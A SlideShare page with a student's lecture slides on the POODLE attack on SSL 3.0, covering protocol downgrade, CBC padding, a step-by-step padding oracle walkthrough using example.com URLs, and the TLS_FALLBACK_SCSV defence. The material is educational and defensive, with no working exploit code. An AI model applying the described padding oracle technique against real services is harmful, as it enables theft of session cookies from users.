SlideShare une entreprise Scribd logo

Poodle

Télécharger en tant que PPTX, PDF
Shreyas Kothari
Shreyas Kothari

Poodle stands for Padding Oracle On Downgraded Legacy Encryption is an attack on SSL v3.0 which brings end of SSL. If you have got any doubts with the presentation, feel free to contact me via email.

Formation
1  sur  32
POODLE Padding Oracle On Downgraded Legacy Encryption. Shreyas Kothari (140302003) M.Tech (CNIS)
Introduction • Secure Socket Layer (SSL) protocol was discovered to provide secure transmission between two parties. This protocol became industry standard and was widely adopted by Vendors in their products to give a secure channel for data transmission. • However from time to time this various vulnerabilities like Man in the middle attack (MITM), POODLE attack etc. were discovered in SSL protocol resulting in different versions of this protocol termed as 1.0, 2.0, and 3.0. Due to this a new standard has been developed named as TLS and it also has its various version namely TLS 1.0, TLS 1.1, TLS 1.2.
Introduction – Contd. • Since SSL was widely adopted so it would not have been economical to replace all SSL products with TLS. Thus TLS have been made backward compatible with SSL to provide smooth user experience. • Even if both client and server are TLS compatible, many clients offer a protocol downgrade dance to avoid any interoperability bugs. Due to this behaviour a new Vulnerability termed as POODLE (Padding Oracle on Downgraded Legacy Encryption) was discovered. • Due to this vulnerability, attacker can steal bearer tokens such as HTTP cookies.
What is POODLE Attack ? • As stated in the previous slides, many TLS clients offer a protocol downgrade dance to avoid any interoperability bugs. • This means that whenever a handshake starts, highest protocol version supported by client is presented. • If server is not compatible with the protocol version presented by client, then handshake fails and later the handshake is successful by server informing the best TLS/SSL version it can support. • Here is the point.
Contd. • If the network between client and server is controlled by an attacker then it can impersonate for both entities and can cause the connection to fall back to SSL 3.0. So the initial vector for this attack is the protocol downgrade dance supported by clients. • Once the channel between the entities is moved down to SSL 3.0 then this vulnerability can be exploited. • Vulnerability exploited is the known Padding Oracle attack. • Since SSL authenticate before encryption, this design flaw in SSL has made this vulnerability possible. Oracle padding attack is done against the CBC mode ciphers in the SSLv3.
Cipher Block Chaining (CBC) :
Padding • Padding adds those extra few bits which are necessary before encryption to make a meaningful block. • Here we are interested to know the padding scheme PKCS#5 as it is used in the CBC Mode. • In PKCS#5, the final block of plaintext is padded with N bytes of value N.
PKCS#5
Padding Oracle Attack • In Cryptography, an “oracle” is a system that performs cryptographic actions by taking in certain input. • Hence a “padding oracle” is a type of system that takes in encrypted data from the user, decrypts it and verifies whether the padding is correct or not. • Let us now try to understand that how this attack is performed.
Padding Oracle Attack • Consider the below URL. • https://www.example.com/home.asp?UID=8A219A434525535FF324 D4G56FC9534 • Let us assume that some information is sent in this UID parameter (say username) in encrypted form using the CBC mode and PKCS #5 standard. So the application decrypts this value and returns the results based on that value.
Padding Oracle Attack • Three Scenarios are possible • Case 1) Valid cipher text – Valid and normal page • Case 2) Invalid cipher text [with improper padding] – Invalid page [such as 404 – Not Found] • Case 3) Valid cipher text but invalid padding [error]
Padding Oracle Attack • Case 1: • Say you sent the value UID=8A219A434525535FF324D4G56FC95348 and it decrypts to a valid user “Shreyas”. Then the application would send a normal response. • Case 2: • Say you sent the value UID=998877PA434525535FF324D4G56FC95348 and it decrypts to “aswjkaja” (invalid user). The application might respond back with a 404 message saying no such page exists.
Padding Oracle Attack • Case 3: • Say you sent the value UID=66IXS7IA434525535FF324D4G56FC95348 and it decrypts to “Ravi” (valid user) but with invalid padding. The application would return some exception. • Thus, if you can send different cipher texts and find out if they decrypt to different values with valid padding or not then you can decrypt any given cipher text.
Padding Oracle Attack • In CBC decryption, each cipher text is passed through the cipher, then XORed with the previous cipher text block to give the plaintext. • So if you take our above example, the cipher blocks would be first created as shown below. • https://www.example.com/home.asp?UID=8A219A43|4525535F|F32 4D4G5|6FC9534 • Cipher blocks: 8A219A43| 4525535F| F324D4G5| 6FC95348
Padding Oracle Attack
Padding Oracle Attack • If the request with initial block of all zeros is sent, it would most probably result in 500, since it might not decrypt to any valid value. • https://www.example.com/home.asp?UID=00000000|4525535F|F32 4D4G5|6FC95348
Padding Oracle Attack • But now send the same request by initializing the value of this initial block by 1. • https://www.example.com/home.asp?UID=00000001|4525535F|F32 4D4G5|6FC95348
Padding Oracle Attack • Although the server returns the error message but still the last value of the decrypted cipher text has changed since you sent 0x01 in the request. • Thus we keep on repeating this step up to FF, we will once hit a value that produces a valid padding sequence. • Only one value out of 256 different possibilities will produce a correct padding byte. • When you hit this value, you should end up with a different response than the other 255 requests.
Padding Oracle Attack
Padding Oracle Attack • From this, we can now calculate the intermediate value at this position, since we know that when XORed with 0x3C, it produces 0x01. • If [ Intermediate Value ] ^ 0x3C = 0x01 • That implies, 0x3C ^ 0x01 = Intermediate Value • Hence, Intermediate Value = 0x3D • Using this technique, we can work our way backwards through the entire block until every byte of the intermediate value is cracked, thus getting the decrypted value one at a time.
Padding Oracle Attack on SSL 3.0 • Let us take one example to understand how Padding Oracle Attack is performed on SSL 3.0. • Suppose a request contains sensitive data like HTTP Cookies in one of the blocks. • That block is replaced by the last block of the request which is the padding block. • Than the Padding Oracle Attack is carried out and thus the sensitive data can be revealed because of this vulnerability.
You can check whether your browser is vulnerable to POODLE Attack. Go to the following website to check. https://www.poodletest.com
Firefox v29
Firefox v34
You can check whether any website is vulnerable to POODLE Attack or not. Go to the following Website https://www.poodlescan.com
https://www.manipal.edu
www.monsterindia.com
Protection against POODLE Attack • The only way to avoid this attack as of now is to disable or avoid using SSL 3.0 and upgrade to TLS. • FOR TLS clients and servers: TLS clients that do protocol downgrade dance should include the TLS_FALLBACK_SCSV in ClientHello.cipher_suites in any fall back handshakes. • This value will indicate that a possible downgrade attack is underway and the connection will be refused. TLS on seeing TLS_FALLBACK_SCSV in ClientHello.cipher_suites will check the SSL/TLS version stated by client and if TLS server has a highest version then that connection will be terminated.
TLS_FALLBACK_SCSV • TLS Fallback Signaling Cipher Suite Value (SCSV) prevents the downgrade attack. • TLS_FALLBACK_SCSV {0x56, 0x00} • This is a signalling cipher suite value, i.e., it does not actually correspond to a suite of cryptosystems, and it can never be selected by the server in the handshake. • If this message appears in the ClientHello.cipher_suite message and the highest protocol version supported by the server is higher than that of the client than the server must respond with inappropriate_fallback alert. This is a fetal error.
Any Doubts ? ?
References • Padding Oracle Attack • http://resources.infosecinstitute.com/padding-oracle-attack-2/ • POODLE Attack • http://resources.infosecinstitute.com/end-ssl-poodle/ • Poodle Bites - Exploiting the SSL 3.0 Fallback • https://www.openssl.org/~bodo/ssl-poodle.pdf • PKCS #5 • http://tools.ietf.org/html/rfc2898
Poodle

Recommandé

Steganography
Steganography Steganography
Steganography Uttam Jain
 
steganography
steganographysteganography
steganographyshiveverma
 
Network Security Chapter 7
Network Security Chapter 7Network Security Chapter 7
Network Security Chapter 7AfiqEfendy Zaen
 
Dynamic storage allocation techniques
Dynamic storage allocation techniquesDynamic storage allocation techniques
Dynamic storage allocation techniquesShashwat Shriparv
 
Proxy servers
Proxy serversProxy servers
Proxy serversKumar
 
What is Cryptography and Types of attacks in it
What is Cryptography and Types of attacks in itWhat is Cryptography and Types of attacks in it
What is Cryptography and Types of attacks in itlavakumar Thatisetti
 
Message and Stream Oriented Communication
Message and Stream Oriented CommunicationMessage and Stream Oriented Communication
Message and Stream Oriented CommunicationDilum Bandara
 
Security Mechanisms
Security MechanismsSecurity Mechanisms
Security Mechanismspriya_trehan
 

Recommandé

Steganography
Steganography Steganography
Steganography Uttam Jain
 
steganography
steganographysteganography
steganographyshiveverma
 
Network Security Chapter 7
Network Security Chapter 7Network Security Chapter 7
Network Security Chapter 7AfiqEfendy Zaen
 
Dynamic storage allocation techniques
Dynamic storage allocation techniquesDynamic storage allocation techniques
Dynamic storage allocation techniquesShashwat Shriparv
 
Proxy servers
Proxy serversProxy servers
Proxy serversKumar
 
What is Cryptography and Types of attacks in it
What is Cryptography and Types of attacks in itWhat is Cryptography and Types of attacks in it
What is Cryptography and Types of attacks in itlavakumar Thatisetti
 
Message and Stream Oriented Communication
Message and Stream Oriented CommunicationMessage and Stream Oriented Communication
Message and Stream Oriented CommunicationDilum Bandara
 
Security Mechanisms
Security MechanismsSecurity Mechanisms
Security Mechanismspriya_trehan
 
Hybrid encryption
Hybrid encryption Hybrid encryption
Hybrid encryption ranjit banshpal
 
Transposition Cipher
Transposition CipherTransposition Cipher
Transposition Cipherdaniyalqureshi712
 
Firewall in Network Security
Firewall in Network SecurityFirewall in Network Security
Firewall in Network Securitylalithambiga kamaraj
 
Cyber security
Cyber security Cyber security
Cyber security Shivam Yadav
 
Cryptography and Network Lecture Notes
Cryptography and Network Lecture NotesCryptography and Network Lecture Notes
Cryptography and Network Lecture NotesFellowBuddy.com
 
Hash Function
Hash FunctionHash Function
Hash FunctionSiddharth Srivastava
 
RSA ALGORITHM
RSA ALGORITHMRSA ALGORITHM
RSA ALGORITHMShashank Shetty
 
Cryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherCryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherNiloy Biswas
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
software-security.ppt
software-security.pptsoftware-security.ppt
software-security.pptPRALHAD MAGADUM
 
RSA & MD5 algorithm
RSA & MD5 algorithmRSA & MD5 algorithm
RSA & MD5 algorithmSiva Rushi
 
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSISIMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSISShivam Porwal
 
CONVENTIONAL ENCRYPTION
CONVENTIONAL ENCRYPTIONCONVENTIONAL ENCRYPTION
CONVENTIONAL ENCRYPTIONSHUBHA CHATURVEDI
 
Hash function
Hash function Hash function
Hash function Salman Memon
 
Social Engineering.pdf
Social Engineering.pdfSocial Engineering.pdf
Social Engineering.pdfMeshalALshammari12
 
Steganography presentation
Steganography presentationSteganography presentation
Steganography presentationAshwin Prasad
 
Introduction to Network Security
Introduction to Network SecurityIntroduction to Network Security
Introduction to Network SecurityJohn Ely Masculino
 
Symmetric encryption and message confidentiality
Symmetric encryption and message confidentialitySymmetric encryption and message confidentiality
Symmetric encryption and message confidentialityCAS
 
Email security
Email securityEmail security
Email securityBaliram Yadav
 
Presentation On Steganography
Presentation On SteganographyPresentation On Steganography
Presentation On SteganographyTeachMission
 
SSLv3 and POODLE
SSLv3 and POODLESSLv3 and POODLE
SSLv3 and POODLEJerome Smith
 
Ssl attacks
Ssl attacksSsl attacks
Ssl attacksn|u - The Open Security Community
 

Contenu connexe

Tendances

Cryptography and Network Lecture Notes
Cryptography and Network Lecture NotesCryptography and Network Lecture Notes
Cryptography and Network Lecture NotesFellowBuddy.com
 
Cryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherCryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherNiloy Biswas
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
RSA & MD5 algorithm
RSA & MD5 algorithmRSA & MD5 algorithm
RSA & MD5 algorithmSiva Rushi
 
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSISIMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSISShivam Porwal
 
Steganography presentation
Steganography presentationSteganography presentation
Steganography presentationAshwin Prasad
 
Introduction to Network Security
Introduction to Network SecurityIntroduction to Network Security
Introduction to Network SecurityJohn Ely Masculino
 
Symmetric encryption and message confidentiality
Symmetric encryption and message confidentialitySymmetric encryption and message confidentiality
Symmetric encryption and message confidentialityCAS
 
Presentation On Steganography
Presentation On SteganographyPresentation On Steganography
Presentation On SteganographyTeachMission
 

Tendances (20)

Hybrid encryption
Hybrid encryption Hybrid encryption
Hybrid encryption
 
Transposition Cipher
Transposition CipherTransposition Cipher
Transposition Cipher
 
Firewall in Network Security
Firewall in Network SecurityFirewall in Network Security
Firewall in Network Security
 
Cyber security
Cyber security Cyber security
Cyber security
 
Cryptography and Network Lecture Notes
Cryptography and Network Lecture NotesCryptography and Network Lecture Notes
Cryptography and Network Lecture Notes
 
Hash Function
Hash FunctionHash Function
Hash Function
 
RSA ALGORITHM
RSA ALGORITHMRSA ALGORITHM
RSA ALGORITHM
 
Cryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipherCryptography - Block cipher & stream cipher
Cryptography - Block cipher & stream cipher
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
software-security.ppt
software-security.pptsoftware-security.ppt
software-security.ppt
 
RSA & MD5 algorithm
RSA & MD5 algorithmRSA & MD5 algorithm
RSA & MD5 algorithm
 
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSISIMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
IMAGE STEGANOGRAPHY JAVA PROJECT SYNOPSIS
 
CONVENTIONAL ENCRYPTION
CONVENTIONAL ENCRYPTIONCONVENTIONAL ENCRYPTION
CONVENTIONAL ENCRYPTION
 
Hash function
Hash function Hash function
Hash function
 
Social Engineering.pdf
Social Engineering.pdfSocial Engineering.pdf
Social Engineering.pdf
 
Steganography presentation
Steganography presentationSteganography presentation
Steganography presentation
 
Introduction to Network Security
Introduction to Network SecurityIntroduction to Network Security
Introduction to Network Security
 
Symmetric encryption and message confidentiality
Symmetric encryption and message confidentialitySymmetric encryption and message confidentiality
Symmetric encryption and message confidentiality
 
Email security
Email securityEmail security
Email security
 
Presentation On Steganography
Presentation On SteganographyPresentation On Steganography
Presentation On Steganography
 

En vedette

The Poodle Presentation
The Poodle PresentationThe Poodle Presentation
The Poodle Presentationziuzita
 
Malicious file upload attacks - a case study
Malicious file upload attacks - a case studyMalicious file upload attacks - a case study
Malicious file upload attacks - a case studyOktawian Powazka
 
Crypto 101: Encryption, Codebreaking, SSL and Bitcoin
Crypto 101: Encryption, Codebreaking, SSL and BitcoinCrypto 101: Encryption, Codebreaking, SSL and Bitcoin
Crypto 101: Encryption, Codebreaking, SSL and BitcoinPriyanka Aash
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)Jerome Smith
 
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...Amazon Web Services
 
SSL/POODLE: History repeats itself
SSL/POODLE: History repeats itselfSSL/POODLE: History repeats itself
SSL/POODLE: History repeats itselfYurii Bilyk
 
CamSec Sept 2016 - Tricks to improve web app excel export attacks
CamSec Sept 2016 - Tricks to improve web app excel export attacksCamSec Sept 2016 - Tricks to improve web app excel export attacks
CamSec Sept 2016 - Tricks to improve web app excel export attacksJerome Smith
 
BSides MCR 2016: From CSV to CMD to qwerty
BSides MCR 2016: From CSV to CMD to qwertyBSides MCR 2016: From CSV to CMD to qwerty
BSides MCR 2016: From CSV to CMD to qwertyJerome Smith
 
Defect life cycle and Defect Status Life Cycle
Defect life cycle and Defect Status Life CycleDefect life cycle and Defect Status Life Cycle
Defect life cycle and Defect Status Life Cyclepavansmiles
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...Simone Onofri
 
Ssl (Secure Sockets Layer)
Ssl (Secure Sockets Layer)Ssl (Secure Sockets Layer)
Ssl (Secure Sockets Layer)Asad Ali
 
SSL & TLS Architecture short
SSL & TLS Architecture shortSSL & TLS Architecture short
SSL & TLS Architecture shortAvirot Mitamura
 
Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks Venkatesh Iyer
 

En vedette (20)

SSLv3 and POODLE
SSLv3 and POODLESSLv3 and POODLE
SSLv3 and POODLE
 
Ssl attacks
Ssl attacksSsl attacks
Ssl attacks
 
Poodle
PoodlePoodle
Poodle
 
The Poodle Presentation
The Poodle PresentationThe Poodle Presentation
The Poodle Presentation
 
Malicious file upload attacks - a case study
Malicious file upload attacks - a case studyMalicious file upload attacks - a case study
Malicious file upload attacks - a case study
 
Crypto 101: Encryption, Codebreaking, SSL and Bitcoin
Crypto 101: Encryption, Codebreaking, SSL and BitcoinCrypto 101: Encryption, Codebreaking, SSL and Bitcoin
Crypto 101: Encryption, Codebreaking, SSL and Bitcoin
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)
 
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
 
SSL/POODLE: History repeats itself
SSL/POODLE: History repeats itselfSSL/POODLE: History repeats itself
SSL/POODLE: History repeats itself
 
CamSec Sept 2016 - Tricks to improve web app excel export attacks
CamSec Sept 2016 - Tricks to improve web app excel export attacksCamSec Sept 2016 - Tricks to improve web app excel export attacks
CamSec Sept 2016 - Tricks to improve web app excel export attacks
 
BSides MCR 2016: From CSV to CMD to qwerty
BSides MCR 2016: From CSV to CMD to qwertyBSides MCR 2016: From CSV to CMD to qwerty
BSides MCR 2016: From CSV to CMD to qwerty
 
Defect life cycle and Defect Status Life Cycle
Defect life cycle and Defect Status Life CycleDefect life cycle and Defect Status Life Cycle
Defect life cycle and Defect Status Life Cycle
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
Gli HTTP Security Header e altri elementi da sapere su HTTP in un Web Applica...
 
Ssl (Secure Sockets Layer)
Ssl (Secure Sockets Layer)Ssl (Secure Sockets Layer)
Ssl (Secure Sockets Layer)
 
SSL/TLS
SSL/TLSSSL/TLS
SSL/TLS
 
Clickjacking Attack
Clickjacking AttackClickjacking Attack
Clickjacking Attack
 
Click Jacking
Click JackingClick Jacking
Click Jacking
 
SSL & TLS Architecture short
SSL & TLS Architecture shortSSL & TLS Architecture short
SSL & TLS Architecture short
 
Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks Introduction to Peer-to-Peer Networks
Introduction to Peer-to-Peer Networks
 

Similaire à Poodle

SSL Secure socket layer
SSL Secure socket layerSSL Secure socket layer
SSL Secure socket layerAhmed Elnaggar
 
Sql server lesson11
Sql server lesson11Sql server lesson11
Sql server lesson11Ala Qunaibi
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 
SECURE SOCKET LAYER ( WEB SECURITY )
SECURE SOCKET LAYER ( WEB SECURITY )SECURE SOCKET LAYER ( WEB SECURITY )
SECURE SOCKET LAYER ( WEB SECURITY )Monodip Singha Roy
 
PPT ON WEB SECURITY BY MONODIP SINGHA ROY
PPT ON WEB SECURITY BY MONODIP SINGHA ROYPPT ON WEB SECURITY BY MONODIP SINGHA ROY
PPT ON WEB SECURITY BY MONODIP SINGHA ROYMonodip Singha Roy
 
SecureSocketLayer.ppt
SecureSocketLayer.pptSecureSocketLayer.ppt
SecureSocketLayer.pptPranavUndre1
 
Dr. Omar Ali Alibrahim - Ssl talk
Dr. Omar Ali Alibrahim - Ssl talkDr. Omar Ali Alibrahim - Ssl talk
Dr. Omar Ali Alibrahim - Ssl talkpromediakw
 
BAIT1103 Chapter 4
BAIT1103 Chapter 4BAIT1103 Chapter 4
BAIT1103 Chapter 4limsh
 
Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Vishal Kumar
 
Network Security_Module_2_Dr Shivashankar
Network Security_Module_2_Dr ShivashankarNetwork Security_Module_2_Dr Shivashankar
Network Security_Module_2_Dr ShivashankarDr. Shivashankar
 
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Cybersecurity Education and Research Centre
 
ssl-tls-ipsec-vpn.pptx
ssl-tls-ipsec-vpn.pptxssl-tls-ipsec-vpn.pptx
ssl-tls-ipsec-vpn.pptxjithu26327
 
Common crypto attacks and secure implementations
Common crypto attacks and secure implementationsCommon crypto attacks and secure implementations
Common crypto attacks and secure implementationsTrupti Shiralkar, CISSP
 

Similaire à Poodle (20)

CRYPTOGRAPHY AND NETWORK SECURITY- Transport-level Security
CRYPTOGRAPHY AND NETWORK SECURITY- Transport-level SecurityCRYPTOGRAPHY AND NETWORK SECURITY- Transport-level Security
CRYPTOGRAPHY AND NETWORK SECURITY- Transport-level Security
 
SSL Secure socket layer
SSL Secure socket layerSSL Secure socket layer
SSL Secure socket layer
 
Web security
Web securityWeb security
Web security
 
Sql server lesson11
Sql server lesson11Sql server lesson11
Sql server lesson11
 
Sequere socket Layer
Sequere socket LayerSequere socket Layer
Sequere socket Layer
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
 
SECURE SOCKET LAYER ( WEB SECURITY )
SECURE SOCKET LAYER ( WEB SECURITY )SECURE SOCKET LAYER ( WEB SECURITY )
SECURE SOCKET LAYER ( WEB SECURITY )
 
PPT ON WEB SECURITY BY MONODIP SINGHA ROY
PPT ON WEB SECURITY BY MONODIP SINGHA ROYPPT ON WEB SECURITY BY MONODIP SINGHA ROY
PPT ON WEB SECURITY BY MONODIP SINGHA ROY
 
SecureSocketLayer.ppt
SecureSocketLayer.pptSecureSocketLayer.ppt
SecureSocketLayer.ppt
 
Dr. Omar Ali Alibrahim - Ssl talk
Dr. Omar Ali Alibrahim - Ssl talkDr. Omar Ali Alibrahim - Ssl talk
Dr. Omar Ali Alibrahim - Ssl talk
 
BAIT1103 Chapter 4
BAIT1103 Chapter 4BAIT1103 Chapter 4
BAIT1103 Chapter 4
 
Secure socket later
Secure socket laterSecure socket later
Secure socket later
 
Firewall traversals
Firewall traversalsFirewall traversals
Firewall traversals
 
Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2
 
Network Security_Module_2_Dr Shivashankar
Network Security_Module_2_Dr ShivashankarNetwork Security_Module_2_Dr Shivashankar
Network Security_Module_2_Dr Shivashankar
 
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
 
ssl-tls-ipsec-vpn.pptx
ssl-tls-ipsec-vpn.pptxssl-tls-ipsec-vpn.pptx
ssl-tls-ipsec-vpn.pptx
 
FreeBSD and Hardening Web Server
FreeBSD and Hardening Web ServerFreeBSD and Hardening Web Server
FreeBSD and Hardening Web Server
 
Common crypto attacks and secure implementations
Common crypto attacks and secure implementationsCommon crypto attacks and secure implementations
Common crypto attacks and secure implementations
 
Secure Socket Layer.pptx
Secure Socket Layer.pptxSecure Socket Layer.pptx
Secure Socket Layer.pptx
 

Dernier

The byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxThe byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxShobhayan Kirtania
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...fonyou31
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfchloefrazer622
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...anjaliyadav012327
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajanpragatimahajan3
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesFatimaKhan178732
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxSayali Powar
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room service9548086042 for call girls in Indira Nagar with room service
9548086042 for call girls in Indira Nagar with room servicediscovermytutordmt
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
Student login on Anyboli platform.helpin
Student login on Anyboli platform.helpinStudent login on Anyboli platform.helpin
Student login on Anyboli platform.helpinRaunakKeshri1
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfJayanti Pande
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 

Dernier (20)

The byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxThe byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptx
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdf
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
